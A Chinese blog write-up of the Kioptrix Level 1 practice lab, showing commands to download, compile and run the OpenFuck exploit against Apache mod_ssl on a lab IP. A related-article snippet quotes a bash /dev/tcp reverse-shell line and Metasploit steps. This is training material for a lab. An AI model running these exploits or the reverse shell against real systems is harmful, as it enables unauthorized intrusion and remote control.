kioptrix1(mod_ssl版本漏洞提权)

最新推荐文章于 2023-09-17 16:42:53 发布
最新推荐文章于 2023-09-17 16:42:53 发布
阅读量825 收藏
点赞数 1
分类专栏: kioptrix系列 文章标签: linux 网络 https ssl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127520784
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:vdo6

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

探测目标靶机开放端口和服务情况

漏洞利用

1.查看网页

2.查找mod_ssl相关漏洞,进行编译,即可提权成功。

searchsploit mod_ssl

权限提升

1.这里也可以从github中下载相关项目!按照步骤走即可提权。

GitHub - heltonWernik/OpenLuck: OpenFuck exploit updated to linux 2018 - Apache mod_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow

git clone https://github.com/heltonWernik/Openluck 
apt-get install libssl-dev
cd Openluck
gcc -o OpenFuck OpenFuck.c -lcrypto
./OpenFuck
./OpenFuck 0x6b 192.168.1.102 443 -c 50

2.下载完 进入Openluck目录,进行编译

3.查看用法

4.找到对应版本,填写参数

5.运行,成功提权,轻松拿下!!!

./OpenFuck 0x6b 192.168.1.102 443 -c 50

魏钦6666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 523
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
Kioptrix-1
qq_62066842的博客
03-29 345
vulnhub入门靶场Kioptrix系列练习
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 400
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞
kioptrix-leva1靶场渗透测试
最新发布
viki101的博客
09-17 1034
msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.122.133 //设置被攻击目标ip。msf5 auxiliary(scanner/smb/smb_version) > set rport 139 //设置端口。msf5 auxiliary(scanner/smb/smb_version) > run //运行。目标机 bash -i >& /dev/tcp/192.168.122.128/2333 0>&1。
Kioptrix: Level 1靶机实战 443 mod_ssl 2.8.4溢出漏洞 47080 getshell samba 2.2.1a 溢出漏洞get root权限 samba版本
YouthBelief的博客
11-15 2780
Kioptrix: Level 1靶机实战前言信息收集探测靶机ipnmap探测端口访问首页枚举目录443端口入手searchsploit搜索漏洞拷贝漏洞编译expexp利用139端口入手探测版本(msf探测成功)smbclientenum4linuxmsf寻找漏洞(1) searchsploit 搜索(2) 谷歌搜索msf攻击总结 前言 Kioptrix: Level 1 (#1): 靶机地址 https://www.vulnhub.com/entry/kioptrix-level-1-1 下载解压好后
vulhub——Kioptrix: Level 1 (#1)
战神/calmness的博客
06-04 287
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 目标地址:192.168.243.37 攻击地址:192.168.18.148 目录 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 信息收集 MSF 建立连接 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh..
mod_ssl-2.6.0-1.3.12.tar.gz_mod_ssl
09-20
1. **下载与编译**:在Apache服务器上安装mod_ssl,首先需要下载对应版本的源码包,例如“mod_ssl-2.6.0-1.3.12.tar.gz”。解压后,按照Apache的模块编译方式,运行“./configure”,“make”和“make install”命令...
mod_ssl-2.4.4-1.x86_64.rpm
08-16
mod_ssl-2.4.4-1.x86_64.rpm
mod_ssl-2.2.15-69.el6.centos.x86_64.rpm
07-24
mod_ssl-2.2.15-69.el6.centos.x86_64.rpm
mod_ssl.so
07-28
mod_ssl.so
mod_ssl-2.4.6-97.el7.centos.1.x86_64.rpm
01-30
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
apache_openssl漏洞的利用及权限的提升
ncnynl的专栏
09-07 2157
apache_openssl漏洞的利用及权限的提升--nightcat转载请保持文章完整第一部分:获得shell.在packetstorm玩了一段时间,遇到有openssl-too-open.tar.gz这个exploit.现在看看软件包的描述:OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers whi
kioptrix.level1 -VulnHub靶机学习记录
weixin_45509443的博客
06-16 565
1.
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 499
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
vulnhub-Kioptrix Level 1 (考点:mod_ssl / smb139/smb版本探测)不用msf
冬萍子癸水
04-19 634
C:\root\Desktop> nikto -h http://192.168.189.163 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.189.163 + Target Hostname: ...
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1604
Oscp备考
Vunlhub靶场 Kioptrix 1
m0_57221101的博客
02-18 226
勘探 nmap探查 port 备注 22 openSSH2.9 80 apache 1.3.20 111 rpcbind 139 smb 443 1024 80web 443同80 dirsearch进行一下目录爆破 python3.9 dirsearch.py -u 192.168.1.103 [20:16:17] 200 - 3KB - /index.html
Kioptrix Level 1 渗透方案
SecUpdate的专栏
06-22 3151
目标:Kioptrix Level 1[VMWare] 本机环境:BackTrack5 RC3[VMware](192.168.74.145) 网关:192.168.74.254 使用工具:nmap #1:查看 Kioptrix 在内网的IP地址。 工具:nmap 命令:nmap 192.168.74.0/24 –n –sP -sn 得到IP:192.168.74.1

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值